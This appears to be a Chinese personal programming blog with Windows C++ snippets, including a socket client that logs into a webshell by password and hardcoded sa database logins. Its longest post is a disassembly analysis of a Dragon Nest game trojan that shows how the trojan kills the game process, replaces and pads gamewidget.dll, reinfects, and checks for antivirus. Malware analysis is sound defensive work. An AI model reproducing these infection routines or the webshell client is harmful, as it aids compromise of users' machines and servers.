零度x's blog

获取进程数

零度x — Wed, 09 Mar 2011 14:16:17 +0000

DWORD dwProcs[1024*2]; DWORD dwNeeded; EnumProcesses( dwProcs, sizeof(dwProcs), &dwNeeded ); 阅读全文——共124字

很久没更新了。。。

零度x — Tue, 22 Feb 2011 06:53:11 +0000

很久没更新了，最近太忙，项目终于大体成型了，也搞定了360主攻防御，哇哈哈~

VC监控打印机

零度x — Sun, 02 Jan 2011 01:09:55 +0000

char temp[50];
HANDLE hPrinter = NULL;
DWORD dwNeeded = 0;
DWORD dwReturned = 0;
JOB_INFO_1 *pJobInfo = NULL;
int n = 0;
int ret = OpenPrinter(“\\\\192.168.10.13\\Canon MX310 series Printer”, &hPrinter, NULL);
if(ret == 0)
{
p->MessageBox(“打开打印机失败！”);
return 0;
}

while(p->IsListening)
{
EnumJobs(hPrinter,0,0xFFFFFFFF,1,NULL,0,&dwNeeded,&dwReturned);
if((pJobInfo = (JOB_INFO_1*)malloc(dwNeeded)) == NULL)
{
p->MessageBox(“分配空间失败！”);
ClosePrinter(hPrinter);
return 0;
}
if(!EnumJobs(hPrinter,0,0xFFFFFFFF,1,(LPBYTE)pJobInfo,dwNeeded,&dwNeeded,&dwReturned))
{
p->MessageBox(“枚举失败！”);
ClosePrinter(hPrinter);
free(pJobInfo);
return 0;
}

if(p->id != pJobInfo->JobId)
{
n = p->m_list.GetItemCount();
p->m_list.InsertItem(n, pJobInfo->pDocument);
p->m_list.SetItemText(n, 1, pJobInfo->pDatatype);
p->m_list.SetItemText(n, 2, pJobInfo->pMachineName);
p->m_list.SetItemText(n, 3, pJobInfo->pUserName);
p->m_list.SetItemText(n, 4, pJobInfo->pPrinterName);
memset(temp, 0, sizeof(temp));
itoa(pJobInfo->JobId, temp, 10);
p->m_list.SetItemText(n, 5, temp);
p->id = pJobInfo->JobId;
}
free(pJobInfo);
Sleep(1000);
}

WNET获取共享信息

零度x — Sat, 01 Jan 2011 05:04:02 +0000

char RemoteName[] = “\\\\192.168.105.9″;
DWORD ret;
NETRESOURCE nr;
memset(&nr, 0, sizeof(nr));
nr.dwScope = RESOURCE_CONNECTED;
nr.dwType = RESOURCETYPE_ANY;
nr.dwDisplayType = RESOURCEDISPLAYTYPE_GENERIC;
nr.dwUsage = RESOURCEUSAGE_CONNECTABLE;
nr.lpRemoteName = RemoteName;
ret = WNetAddConnection2(&nr, NULL, NULL, CONNECT_UPDATE_PROFILE);

if(ret != NO_ERROR)
{
MessageBox(“失败！”);
return;
}
HANDLE hEnum;
ret = WNetOpenEnum(RESOURCE_GLOBALNET, RESOURCETYPE_ANY, 0, &nr, &hEnum);
if(ret != NO_ERROR)
{
MessageBox(“失败！”);
return;
}

DWORD dwResultEnum;
BYTE buf[16384];
DWORD cbBuffer = 16384; // 16K is a good size
LPNETRESOURCE lpnrLocal = (LPNETRESOURCE)buf;
DWORD cEntries = -1;

do
{
cbBuffer = 16384;
memset(lpnrLocal, 0, 16384);
dwResultEnum = WNetEnumResource(hEnum, // resource handle
&cEntries, // defined locally as -1
lpnrLocal, // LPNETRESOURCE
&cbBuffer); // buffer size
if (dwResultEnum == NO_ERROR)
{
for (DWORD i=0; i {
//CString str_remote = lpnrLocal[i].lpRemoteName;//得到共享名称
if(lpnrLocal[i].dwType == RESOURCETYPE_PRINT)
MessageBox(lpnrLocal[i].lpRemoteName);
}
}
else if (dwResultEnum != ERROR_NO_MORE_ITEMS)
{
break;
}
}
while (dwResultEnum != ERROR_NO_MORE_ITEMS);
WNetCloseEnum(hEnum);

VC socket 实现post提交~

零度x — Thu, 02 Dec 2010 04:02:39 +0000

DWORD WINAPI Start(LPVOID lParam)
{
CPostDlg *p = (CPostDlg *)lParam;
SOCKET sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock == SOCKET_ERROR)
{
p->MessageBox(“创建套接字失败~”);
return 0;
}
SOCKADDR_IN addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
char url[20] = “192.168.10.104″;

addr.sin_addr.S_un.S_addr = inet_addr(“192.168.10.104″);
int ret =connect(sock, (SOCKADDR *)&addr, sizeof(SOCKADDR_IN));
if(ret == SOCKET_ERROR)
{
p->MessageBox(“连接失败~”);
return 0;
}
char buffer[4096];
char pwd[] = “fuckhacker”;
int len = strlen(pwd) + 21;
sprintf(buffer, “POST /webshell1.php HTTP/1.1\r\n”
“Content-Type: application/x-www-form-urlencoded\r\n”
“Host: 192.168.10.104\r\n”
“Content-Length: %d\r\n”
“\r\n”
“password=%s&doing=login”,
len,
pwd);
ret = send(sock, buffer, sizeof(buffer), 0);
if(ret == SOCKET_ERROR)
{
p->MessageBox(“发送失败~”);
return 0;
}
memset(buffer, 0, sizeof(buffer));
ret = recv(sock, buffer, sizeof(buffer), 0);
if(ret == SOCKET_ERROR)
{
p->MessageBox(“接受失败~”);
return 0;
}
CString buf(buffer);
if(buf.Find(“Success”, 0) != -1)
p->MessageBox(“密码正确~”);
else
p->MessageBox(“密码错误~”);
return 0;
}

使用匿名管道实现CMD回显

零度x — Tue, 16 Nov 2010 08:55:31 +0000

DWORD WINAPI MyThread(LPVOID lParam)
{
CTestDlg *p = (CTestDlg *)lParam;

char path[1024];
char cmdline[1024];
char buffer[1024];
memset(buffer, 0, sizeof(buffer));
memset(cmdline, 0, sizeof(cmdline));
memset(path, 0, sizeof(path));
::GetSystemDirectory(path, sizeof(path));

strcpy(cmdline, “ping.exe”);
strcat(cmdline, ” 127.0.0.1″);

HANDLE hwrite,hread;
SECURITY_ATTRIBUTES sa;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if(!::CreatePipe(&hread, &hwrite, &sa,0))
{
p->MessageBox(“创建管道出错！”);
return 0;
}

STARTUPINFO si;
memset(&si, 0, sizeof(si));
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.hStdOutput = hwrite;
si.hStdError = hwrite;
si.wShowWindow = SW_HIDE;
PROCESS_INFORMATION pi;
memset(&pi, 0, sizeof(pi));

if(!::CreateProcess( NULL, cmdline, NULL, NULL, TRUE, 0, NULL, path, &si, &pi))
{
p->MessageBox(“打开进程出错！”);
return 0;
}
::CloseHandle(hwrite);

DWORD byte = 0;

p->m_out = “”;
while(TRUE)
{
if(!ReadFile(hread, buffer, sizeof(buffer), &byte, NULL))
break;
if(byte > 0)
{
p->m_out += buffer;
}
Sleep(1000);
}
p->UpdateData(FALSE);
return 0;
}

使用ado中的Stream对象向数据库上传图片

零度x — Tue, 26 Oct 2010 08:15:31 +0000

try
{
CoInitialize(NULL);
_ConnectionPtr pConnection(__uuidof(Connection));
_RecordsetPtr pRecordset(__uuidof(Recordset));

pConnection->ConnectionString = “Provider=SQLOLEDB.1;Persist Security Info=False;User ID = sa;Initial Catalog = CodeTest;Data Source = 164.70.6.219″;
pConnection->Open(pConnection->ConnectionString, “”, “”, -1);//连接数据库

pRecordset->Open(“SELECT * FROM ma_q_test”,_variant_t((IDispatch*)pConnection,true),adOpenStatic,adLockOptimistic,adCmdText);
//打开记录集

_StreamPtr pStream(__uuidof(Stream));
_variant_t varOptional(DISP_E_PARAMNOTFOUND,VT_ERROR);
pStream->PutType(adTypeBinary);//设置类型为二进制
pStream->Open(varOptional, adModeUnknown, adOpenStreamUnspecified, _bstr_t(), _bstr_t());//生成二进制流
pStream->LoadFromFile(_bstr_t(“D:\\1.jpg”));//读取文件
_variant_t varBLOB = pStream->Read(adReadAll);//读取到varBLOB

pRecordset->AddNew();//曾加一条记录
pRecordset->GetFields()->GetItem(“image”)->Value = varBLOB;//保存数据对象
pRecordset->PutCollect(“id”, “1″);//设置id
pRecordset->Update();//更新~

pStream->Close();
pStream.Release();
pRecordset->Close();
pRecordset.Release();
if(pConnection->State)
pConnection->Close();
pConnection.Release();
CoUninitialize();
}
catch(_com_error e)
{
MessageBox(e.ErrorMessage());
}

VC ado sql数据库查询

零度x — Fri, 22 Oct 2010 05:05:32 +0000

CString str;

::CoInitialize(NULL);
try
{
_ConnectionPtr conn(__uuidof(Connection));
_RecordsetPtr record(__uuidof(Recordset));

conn->ConnectionString = “Provider=SQLOLEDB.1;Persist Security Info=False;
User ID = sa;//用户名
Initial Catalog = CodeTest;//表名
Data Source = 164.70.6.219″; //服务器地址

conn->Open(conn->ConnectionString, “”, “”, -1);

record = conn->Execute( “select * from CPost”, NULL, adCmdUnknown);
while(!record->myEOF)
{
_variant_t temp = record->GetCollect(“PostName”);//列名，可以是数字
if(temp.vt != VT_NULL)
{
str = (LPCSTR)_bstr_t(temp);
MessageBox(str.GetBuffer(str.GetLength()));
}
record->MoveNext();
}
if(conn->State)//不能多次关闭，否则出错
conn->Close();
record->Clone();
conn.Release();
record.Release();//注意释放，避免引起内存泄露

::CoUninitialize();
}
catch(_com_error e)///捕捉异常
{
CString errormessage;
errormessage.Format(“连接数据库失败!\r\n错误信息:%s”,e.ErrorMessage());
AfxMessageBox(errormessage);///显示错误信息
}

一个龙之谷木马的分析

零度x — Tue, 28 Sep 2010 06:36:10 +0000

病毒样本：http://www.52pojie.cn/thread-64398-1-1.html

只分析了exe，感染的dll下次分析

exe

去除启动时候的小漏斗


004017C9  |.  53            push    ebx
004017CA  |.  55            push    ebp
004017CB  |.  56            push    esi
004017CC  |.  57            push    edi
004017CD  |.  FF15 AC104000 call    dword ptr [<&USER32.GetInputStat>; [GetInputState
004017D3  |.  33DB          xor     ebx, ebx
004017D5  |.  53            push    ebx                              ; /lParam => 0
004017D6  |.  53            push    ebx                              ; |wParam => 0
004017D7  |.  53            push    ebx                              ; |Message => WM_NULL
004017D8  |.  FF15 64104000 call    dword ptr [<&KERNEL32.GetCurrent>; |[GetCurrentThreadId
004017DE  |.  50            push    eax                              ; |ThreadId
004017DF  |.  FF15 B0104000 call    dword ptr [<&USER32.PostThreadMe>; \PostThreadMessageA
004017E5  |.  53            push    ebx                              ; /MsgFilterMax => 0
004017E6  |.  53            push    ebx                              ; |MsgFilterMin => 0
004017E7  |.  8D4424 1C     lea     eax, dword ptr [esp+1C]          ; |
004017EB  |.  53            push    ebx                              ; |hWnd => NULL
004017EC  |.  50            push    eax                              ; |pMsg
004017ED  |.  FF15 B4104000 call    dword ptr [<&USER32.GetMessageA>>; \GetMessageA

读取附加数据


004017F8  |.  68 1C284000   push    0040281C                         ; /Buffer = ctfmon.0040281C
004017FD  |.  56            push    esi                              ; |BufSize => 104 (260.)
004017FE  |.  FF15 60104000 call    dword ptr [<&KERNEL32.GetLogical>; \GetLogicalDriveStringsA
00401804  |.  6A 40         push    40                               ;  获取磁盘
00401806  |.  33C0          xor     eax, eax
00401808  |.  59            pop     ecx
00401809  |.  8D7C24 31     lea     edi, dword ptr [esp+31]
0040180D  |.  885C24 30     mov     byte ptr [esp+30], bl
00401811  |.  56            push    esi                              ; /BufSize => 104 (260.)
00401812  |.  F3:AB         rep     stos dword ptr es:[edi]          ; |
00401814  |.  66:AB         stos    word ptr es:[edi]                ; |
00401816  |.  AA            stos    byte ptr es:[edi]                ; |
00401817  |.  8D4424 34     lea     eax, dword ptr [esp+34]          ; |
0040181B  |.  895C24 14     mov     dword ptr [esp+14], ebx          ; |
0040181F  |.  50            push    eax                              ; |PathBuffer
00401820  |.  53            push    ebx                              ; |hModule => NULL
00401821  |.  FF15 48104000 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401827  |.  8B3D 5C104000 mov     edi, dword ptr [<&KERNEL32.SetFi>;  获取自身路径
0040182D  |.  8B2D 58104000 mov     ebp, dword ptr [<&KERNEL32.ReadF>;  kernel32.ReadFile
00401833  |>  53            /push    ebx                             ; /hTemplateFile
00401834  |.  53            |push    ebx                             ; |Attributes
00401835  |.  6A 03         |push    3                               ; |Mode = OPEN_EXISTING
00401837  |.  53            |push    ebx                             ; |pSecurity
00401838  |.  53            |push    ebx                             ; |ShareMode
00401839  |.  8D4424 44     |lea     eax, dword ptr [esp+44]         ; |
0040183D  |.  68 00000080   |push    80000000                        ; |Access = GENERIC_READ
00401842  |.  50            |push    eax                             ; |FileName
00401843  |.  FF15 28104000 |call    dword ptr [<&KERNEL32.CreateFil>; \CreateFileA
00401849  |.  8BF0          |mov     esi, eax                        ;  打开自身
0040184B  |.  3BF3          |cmp     esi, ebx
0040184D  |.  74 3B         |je      short 0040188A
0040184F  |.  6A 02         |push    2
00401851  |.  53            |push    ebx
00401852  |.  68 3CFEFFFF   |push    -1C4
00401857  |.  56            |push    esi
00401858  |.  FFD7          |call    edi                             ;  kernel32.SetFilePointer
0040185A  |.  8D4424 10     |lea     eax, dword ptr [esp+10]         ;  设置指针
0040185E  |.  53            |push    ebx
0040185F  |.  50            |push    eax
00401860  |.  68 C4010000   |push    1C4
00401865  |.  68 201A4000   |push    00401A20
0040186A  |.  56            |push    esi
0040186B  |.  FFD5          |call    ebp                             ;  kernel32.ReadFile
0040186D  |.  A1 E01B4000   |mov     eax, dword ptr [401BE0]         ;  读取附加数据
00401872  |.  3BC3          |cmp     eax, ebx
00401874  |.  77 23         |ja      short 00401899
00401876  |.  68 E8030000   |push    3E8                             ; /Timeout = 1000. ms
0040187B  |.  FF15 44104000 |call    dword ptr [<&KERNEL32.Sleep>]   ; \Sleep
00401881  |.  56            |push    esi                             ; /hObject
00401882  |.  FF15 20104000 |call    dword ptr [<&KERNEL32.CloseHand>; \CloseHandle
00401888  |.^ EB A9         \jmp     short 00401833                  ; 读取失败则返回
0040188A  |>  5F            pop     edi
0040188B  |.  5E            pop     esi
0040188C  |.  5D            pop     ebp
0040188D  |.  33C0          xor     eax, eax
0040188F  |.  5B            pop     ebx
00401890  |.  81C4 2C030000 add     esp, 32C
00401896  |.  C2 1000       retn    10
00401899  |> \50            push    eax
0040189A  |.  E8 69010000   call    
0040189F  |.  A3 20294000   mov     dword ptr [402920], eax
004018A4  |.  B8 3CFEFFFF   mov     eax, -1C4
004018A9  |.  2B05 E01B4000 sub     eax, dword ptr [401BE0]
004018AF  |.  59            pop     ecx
004018B0  |.  6A 02         push    2
004018B2  |.  53            push    ebx
004018B3  |.  50            push    eax
004018B4  |.  56            push    esi
004018B5  |.  FFD7          call    edi                              ;  kernel32.SetFilePointer
004018B7  |.  8D4424 10     lea     eax, dword ptr [esp+10]          ;  设置文件指针
004018BB  |.  53            push    ebx
004018BC  |.  50            push    eax
004018BD  |.  FF35 E01B4000 push    dword ptr [401BE0]
004018C3  |.  FF35 20294000 push    dword ptr [402920]
004018C9  |.  56            push    esi
004018CA  |.  FFD5          call    ebp                              ;  kernel32.ReadFile
004018CC  |.  56            push    esi                              ; /读取附加数据
004018CD  |.  FF15 20104000 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004018D3  |.  E8 4CF9FFFF   call    00401224                         ;  释放句柄

查找龙之谷进程，找到则结束该进程


004011C0  /$  55            push    ebp                              ;  kernel32.ReadFile
004011C1  |.  8BEC          mov     ebp, esp
004011C3  |.  81EC 28010000 sub     esp, 128
004011C9  |.  56            push    esi
004011CA  |.  6A 00         push    0                                ; /ProcessID = 0
004011CC  |.  6A 02         push    2                                ; |Flags = TH32CS_SNAPPROCESS
004011CE  |.  E8 23080000   call    ; \CreateToolhelp32Snapshot
004011D3  |.  8BF0          mov     esi, eax
004011D5  |.  8D85 D8FEFFFF lea     eax, dword ptr [ebp-128]
004011DB  |.  50            push    eax                              ; /lppe
004011DC  |.  56            push    esi                              ; |hSnapshot
004011DD  |.  C785 D8FEFFFF>mov     dword ptr [ebp-128], 128         ; |
004011E7  |.  E8 04080000   call       ; \Process32First
004011EC  |.  85C0          test    eax, eax
004011EE  |.  74 2F         je      short 0040121F
004011F0  |>  8D85 D8FEFFFF /lea     eax, dword ptr [ebp-128]
004011F6  |.  50            |push    eax                             ; /lppe
004011F7  |.  56            |push    esi                             ; |hSnapshot
004011F8  |.  E8 ED070000   |call       ; \Process32Next
004011FD  |.  85C0          |test    eax, eax
004011FF  |.  74 1E         |je      short 0040121F
00401201  |.  8D85 FCFEFFFF |lea     eax, dword ptr [ebp-104]
00401207  |.  50            |push    eax                             ; /s2
00401208  |.  FF75 08       |push    dword ptr [ebp+8]               ; |s1
0040120B  |.  FF15 9C104000 |call    dword ptr [<&MSVCRT._stricmp>]  ; \_stricmp
00401211  |.  59            |pop     ecx        ; 查找龙之谷进程
00401212  |.  85C0          |test    eax, eax
00401214  |.  59            |pop     ecx
00401215  |.^ 75 D9         \jnz     short 004011F0
00401217  |.  8B85 E0FEFFFF mov     eax, dword ptr [ebp-120]
0040121D  |.  EB 02         jmp     short 00401221
0040121F  |>  33C0          xor     eax, eax
00401221  |>  5E            pop     esi
00401222  |.  C9            leave
00401223  \.  C3            retn

0040122F  |.  50            push    eax                              ; /ProcessId
00401230  |.  6A 00         push    0                                ; |Inheritable = FALSE
00401232  |.  6A 01         push    1                                ; |Access = TERMINATE
00401234  |.  FF15 10104000 call    dword ptr [<&KERNEL32.OpenProces>; \OpenProcess
0040123A  |.  6A 00         push    0                                ; /ExitCode = 0
0040123C  |.  50            push    eax                              ; |hProcess
0040123D  |.  FF15 3C104000 call    dword ptr [<&KERNEL32.TerminateP>; \TerminateProcess
00401243  \.  C3            retn         ; 存在则结束进程

游戏目录下原来的gamewidget.dll拷贝DragonNestRes.dll,然后感染gamewidget.dll并复制一份midimap.dll


004015C2  |.  50            push    eax                              ; /pHandle
004015C3  |.  33DB          xor     ebx, ebx                         ; |
004015C5  |.  68 19000200   push    20019                            ; |Access = KEY_READ
004015CA  |.  53            push    ebx                              ; |Reserved => 0
004015CB  |.  68 64114000   push    00401164                         ; |Subkey = "SOFTWARE\snda\dn"
004015D0  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
004015D5  |.  FF15 08104000 call    dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
004015DB  |.  85C0          test    eax, eax                         ;  读取HKEY_LOCAL_MACHINE\SOFTWARE\snda\dn
004015DD  |. /0F85 8C000000 jnz     0040166F        ; 读取不到则返回
004015E3  |. |6A 40         push    40
004015E5  |. |8DBD F1FEFFFF lea     edi, dword ptr [ebp-10F]
004015EB  |. |59            pop     ecx
004015EC  |. |889D F0FEFFFF mov     byte ptr [ebp-110], bl
004015F2  |. |F3:AB         rep     stos dword ptr es:[edi]
004015F4  |. |66:AB         stos    word ptr es:[edi]
004015F6  |. |AA            stos    byte ptr es:[edi]
004015F7  |. |8D45 F8       lea     eax, dword ptr [ebp-8]
004015FA  |. |C745 F4 01000>mov     dword ptr [ebp-C], 1
00401601  |. |50            push    eax                              ; /pBufSize
00401602  |. |8D85 F0FEFFFF lea     eax, dword ptr [ebp-110]         ; |
00401608  |. |50            push    eax                              ; |Buffer
00401609  |. |8D45 F4       lea     eax, dword ptr [ebp-C]           ; |
0040160C  |. |50            push    eax                              ; |pValueType
0040160D  |. |53            push    ebx                              ; |Reserved => NULL
0040160E  |. |68 58114000   push    00401158                         ; |ValueName = "MainProg"
00401613  |. |C745 F8 04010>mov     dword ptr [ebp-8], 104           ; |
0040161A  |. |FF75 FC       push    dword ptr [ebp-4]                ; |hKey
0040161D  |. |FF15 04104000 call    dword ptr [<&ADVAPI32.RegQueryVa>; \RegQueryValueExA
00401623  |. |85C0          test    eax, eax                         ;  读取路径
004013B3  |.  50            push    eax                              ; /FileName
004013B4  |.  FF15 30104000 call    dword ptr [<&KERNEL32.GetFileAtt>; \GetFileAttributesA
004013BA  |.  83F8 FF       cmp     eax, -1                          ;  获取文件的属性，用来判断DragonNestRes.dll是否存在
004013BD  |.  75 15         jnz     short 004013D4
004013BF  |.  8D85 F4FDFFFF lea     eax, dword ptr [ebp-20C]
004013C5  |.  53            push    ebx                              ; /FailIfExists
004013C6  |.  50            push    eax                              ; |NewFileName
004013C7  |.  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ; |
004013CD  |.  50            push    eax                              ; |ExistingFileName
004013CE  |.  FF15 2C104000 call    dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA
004013D4  |>  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ;  不存在则在游戏目录用原来的gamewidget.dll拷贝DragonNestRes.dll

00401299  /$  55            push    ebp
0040129A  |.  8BEC          mov     ebp, esp
0040129C  |.  81EC 08020000 sub     esp, 208
004012A2  |.  56            push    esi
004012A3  |.  8B75 08       mov     esi, dword ptr [ebp+8]
004012A6  |.  56            push    esi                              ; /FileName
004012A7  |.  FF15 1C104000 call    dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
004012AD  |.  6A 00         push    0                                ; /删除gamewidget.dll
004012AF  |.  56            push    esi                              ; |path
004012B0  |.  FF15 A0104000 call    dword ptr [<&MSVCRT._access>]    ; \_access
004012B6  |.  59            pop     ecx                              ;  判断是否删除成功
00401401  |.  53            push    ebx                              ; /hTemplateFile
00401402  |.  53            push    ebx                              ; |Attributes
00401403  |.  6A 01         push    1                                ; |Mode = CREATE_NEW
00401405  |.  53            push    ebx                              ; |pSecurity
00401406  |.  53            push    ebx                              ; |ShareMode
00401407  |.  68 00000040   push    40000000                         ; |Access = GENERIC_WRITE
0040140C  |.  50            push    eax                              ; |FileName
0040140D  |.  FF15 28104000 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00401413  |.  8BF8          mov     edi, eax                         ;  创建新的gamewidget.dll
00401415  |.  3BFB          cmp     edi, ebx
00401417  |.  75 07         jnz     short 00401420
00401419  |.  33C0          xor     eax, eax
0040141B  |.  E9 A5000000   jmp     004014C5
00401420  |>  8D45 FC       lea     eax, dword ptr [ebp-4]
00401423  |.  53            push    ebx                              ; /pOverlapped
00401424  |.  50            push    eax                              ; |pBytesWritten
00401425  |.  8B35 24104000 mov     esi, dword ptr [<&KERNEL32.Write>; |kernel32.WriteFile
0040142B  |.  FF35 E01B4000 push    dword ptr [401BE0]               ; |nBytesToWrite = 2A00 (10752.)
00401431  |.  FF35 20294000 push    dword ptr [402920]               ; |Buffer = 003D4380
00401437  |.  57            push    edi                              ; |hFile
00401438  |.  FFD6          call    esi                              ; \WriteFile
0040143A  |.  C745 0C D0070>mov     dword ptr [ebp+C], 7D0           ;  写入DLL
00401441  |> /8D45 FC       /lea     eax, dword ptr [ebp-4]
00401444  |. |53            |push    ebx
00401445  |. |50            |push    eax
00401446  |. |FF35 E01B4000 |push    dword ptr [401BE0]
0040144C  |. |FF35 20294000 |push    dword ptr [402920]
00401452  |. |57            |push    edi
00401453  |. |FFD6          |call    esi
00401455  |. |FF4D 0C       |dec     dword ptr [ebp+C]
00401458  |.^\75 E7         \jnz     short 00401441                  ;  再重复写入2000次，曾大文件体积
0040145A  |.  8D45 FC       lea     eax, dword ptr [ebp-4]
0040145D  |.  53            push    ebx
0040145E  |.  50            push    eax
0040145F  |.  68 C4010000   push    1C4
00401464  |.  68 201A4000   push    00401A20
00401469  |.  57            push    edi
0040146A  |.  FFD6          call    esi                              ;  kernel32.WriteFile
0040146C  |.  57            push    edi                              ; /写入附加数据
0040146D  |.  FF15 20104000 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401473  |.  6A 40         push    40                               ;  释放句柄
004014AD  |.  8D85 F0FCFFFF lea     eax, dword ptr [ebp-310]
004014B3  |.  53            push    ebx                              ; /FailIfExists
004014B4  |.  50            push    eax                              ; |NewFileName
004014B5  |.  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ; |
004014BB  |.  50            push    eax                              ; |ExistingFileName = "C:\Program Files\?,A2,"",B4,"笸鏫龙之谷\gamewidget.dll"
004014BC  |.  FF15 2C104000 call    dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA
004014C2  |.  6A 01         push    1                                ;  已经替换的gamewidget.dll拷贝midimap.dll

再次感染


00401684  |.  50            push    eax                              ; /pHandle
00401685  |.  33DB          xor     ebx, ebx                         ; |
00401687  |.  68 19000200   push    20019                            ; |Access = KEY_READ
0040168C  |.  53            push    ebx                              ; |Reserved => 0
0040168D  |.  68 84114000   push    00401184                         ; |Subkey = "Software\Microsoft\Windows\ShellNoRoam\MUICache"
00401692  |.  68 01000080   push    80000001                         ; |hKey = HKEY_CURRENT_USER
00401697  |.  FF15 08104000 call    dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
0040169D  |.  85C0          test    eax, eax                         ;  打开HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
0040169F  |. /0F85 17010000 jnz     004017BC
004016A5  |. |895D FC       mov     dword ptr [ebp-4], ebx
004016A8  |. |BE 04010000   mov     esi, 104
004016AD  |> |6A 40         /push    40
004016AF  |. |33C0          |xor     eax, eax
004016B1  |. |59            |pop     ecx
004016B2  |. |8DBD E5FEFFFF |lea     edi, dword ptr [ebp-11B]
004016B8  |. |889D E4FEFFFF |mov     byte ptr [ebp-11C], bl
004016BE  |. |6A 40         |push    40
004016C0  |. |F3:AB         |rep     stos dword ptr es:[edi]
004016C2  |. |66:AB         |stos    word ptr es:[edi]
004016C4  |. |AA            |stos    byte ptr es:[edi]
004016C5  |. |59            |pop     ecx
004016C6  |. |33C0          |xor     eax, eax
004016C8  |. |8DBD D9FBFFFF |lea     edi, dword ptr [ebp-427]
004016CE  |. |889D D8FBFFFF |mov     byte ptr [ebp-428], bl
004016D4  |. |F3:AB         |rep     stos dword ptr es:[edi]
004016D6  |. |8D4D EC       |lea     ecx, dword ptr [ebp-14]
004016D9  |. |8975 F0       |mov     dword ptr [ebp-10], esi
004016DC  |. |51            |push    ecx                             ; /pBufSize
004016DD  |. |8D8D D8FBFFFF |lea     ecx, dword ptr [ebp-428]        ; |
004016E3  |. |51            |push    ecx                             ; |Buffer
004016E4  |. |8D4D F8       |lea     ecx, dword ptr [ebp-8]          ; |
004016E7  |. |66:AB         |stos    word ptr es:[edi]               ; |
004016E9  |. |51            |push    ecx                             ; |pValueType
004016EA  |. |8D4D F0       |lea     ecx, dword ptr [ebp-10]         ; |
004016ED  |. |53            |push    ebx                             ; |Reserved
004016EE  |. |51            |push    ecx                             ; |pValueCount
004016EF  |. |AA            |stos    byte ptr es:[edi]               ; |
004016F0  |. |8B45 FC       |mov     eax, dword ptr [ebp-4]          ; |
004016F3  |. |FF45 FC       |inc     dword ptr [ebp-4]               ; |
004016F6  |. |8D8D E4FEFFFF |lea     ecx, dword ptr [ebp-11C]        ; |
004016FC  |. |C745 F8 01000>|mov     dword ptr [ebp-8], 1            ; |
00401703  |. |51            |push    ecx                             ; |Value
00401704  |. |50            |push    eax                             ; |Index
00401705  |. |FF75 F4       |push    dword ptr [ebp-C]               ; |hKey
00401708  |. |8975 EC       |mov     dword ptr [ebp-14], esi         ; |
0040170B  |. |FF15 00104000 |call    dword ptr [<&ADVAPI32.RegEnumVa>; \RegEnumValueA
00401711  |. |85C0          |test    eax, eax                        ;  读取键值
00401713  |. |0F85 A3000000 |jnz     004017BC
00401719  |. |6A 40         |push    40
0040171B  |. |8DBD DDFCFFFF |lea     edi, dword ptr [ebp-323]
00401721  |. |59            |pop     ecx
00401722  |. |889D DCFCFFFF |mov     byte ptr [ebp-324], bl
00401728  |. |F3:AB         |rep     stos dword ptr es:[edi]
0040172A  |. |66:AB         |stos    word ptr es:[edi]
0040172C  |. |AA            |stos    byte ptr es:[edi]
0040172D  |. |8D45 E8       |lea     eax, dword ptr [ebp-18]
00401730  |. |8975 E8       |mov     dword ptr [ebp-18], esi
00401733  |. |50            |push    eax                             ; /pBufSize
00401734  |. |8D85 DCFCFFFF |lea     eax, dword ptr [ebp-324]        ; |
0040173A  |. |50            |push    eax                             ; |Buffer
0040173B  |. |8D45 F8       |lea     eax, dword ptr [ebp-8]          ; |
0040173E  |. |50            |push    eax                             ; |pValueType
0040173F  |. |8D85 E4FEFFFF |lea     eax, dword ptr [ebp-11C]        ; |
00401745  |. |53            |push    ebx                             ; |Reserved
00401746  |. |50            |push    eax                             ; |ValueName
00401747  |. |FF75 F4       |push    dword ptr [ebp-C]               ; |hKey
0040174A  |. |FF15 04104000 |call    dword ptr [<&ADVAPI32.RegQueryV>; \RegQueryValueExA
00401750  |. |85C0          |test    eax, eax                        ;  读取LangID
00401752  |.^|0F85 55FFFFFF |jnz     004016AD
00401758  |. |8D85 DCFCFFFF |lea     eax, dword ptr [ebp-324]
0040175E  |. |68 78114000   |push    00401178                        ; /s2 = "dragonnest"
00401763  |. |50            |push    eax                             ; |s1 = "?,AC,"?,B6,"终",B6,"?
00401764  |. |FF15 8C104000 |call    dword ptr [<&MSVCRT.strstr>]    ; \strstr
0040176A  |. |59            |pop     ecx                             ;  查找值为dragonnest的项
0040176B  |. |85C0          |test    eax, eax
0040176D  |. |59            |pop     ecx
0040176E  |.^|0F84 39FFFFFF \je      004016AD

……再一次感染。。。

查找瑞星进程，没找到则把自身移动到回收站，随机文件名


004018E2  |.  BD B4114000   mov     ebp, 004011B4                    ;  ASCII "RavMonD.exe"
004018E7  |.  55            push    ebp
004018E8  |.  E8 D3F8FFFF   call    004011C0                         ;  查找RavMonD.exe，没找到则把自身移动到回收站，随机文件名

00401511  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
00401516  |.  50            push    eax                              ; |PathBuffer
00401517  |.  6A 00         push    0                                ; |hModule = NULL
00401519  |.  FF15 48104000 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
0040151F  |.  8B35 54104000 mov     esi, dword ptr [<&KERNEL32.GetTi>;  获取自身路径
00401525  |.  FFD6          call    esi                              ; [GetTickCount
00401527  |.  50            push    eax                              ; /获取启动时间
00401528  |.  8B3D A8104000 mov     edi, dword ptr [<&USER32.wsprint>; |USER32.wsprintfA
